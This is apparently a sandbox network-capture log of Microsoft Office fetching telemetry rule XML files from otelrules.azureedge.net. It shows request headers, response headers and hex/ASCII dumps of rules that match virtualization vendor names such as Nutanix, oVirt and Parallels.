2024-11-15 13:10:07 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:07 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:07 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131007Z-16547b76f7fwvr5dhC1DFW2c940000000n2g000000008quf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:07 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:07 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:07 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:07 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 2012891f-801e-00ac-7a8d-35fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131007Z-164f84587bfsgfx9hC1DFWw1as000000016000000000aq0b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:07 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:07 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:07 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:07 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 02e40e2a-001e-00a2-7a2b-36d4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131007Z-16547b76f7fkj7j4hC1DFW0a9g0000000n4000000000aczz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:07 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:08 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 5c60c0f5-901e-0067-06a2-34b5cb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131008Z-1866b5c5fbbrf5vdhC1DFW64zw00000001e000000000cam3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:08 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:08 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131008Z-16547b76f7f76p6chC1DFWctqw0000000nc0000000002nqn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:08 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:08 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: fc50ab50-c01e-00a2-4413-372327000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131008Z-164f84587bf7mjf5hC1DFWvyqc000000016000000000axa0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:08 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:08 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 760e684f-301e-0000-24f8-36eecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131008Z-164f84587bf6h2bxhC1DFWbcm800000001f0000000009e9v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:08 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:08 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:08 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:08 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: dd2a3af5-901e-0083-62a3-34bb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131008Z-1866b5c5fbb9ls62hC1DFW4k2s00000001cg000000009nx6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:08 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:09 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:09 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:09 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131009Z-16547b76f7f7rtshhC1DFWrtqn0000000n800000000067a9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:09 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:09 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:09 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:09 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 574f1a94-c01e-0049-095e-35ac27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131009Z-1866b5c5fbbvz6qbhC1DFWsyms00000000cg000000003e43 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-15 13:10:09 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:09 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:09 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:09 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 96c88eee-b01e-005c-317c-364c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131009Z-164f84587bf6n6jwhC1DFW90fn00000000mg00000000344a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:09 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:09 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:09 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:09 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: f3ae074e-d01e-0082-62af-36e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131009Z-1866b5c5fbb9ls62hC1DFW4k2s00000001e0000000007phx x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:09 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" 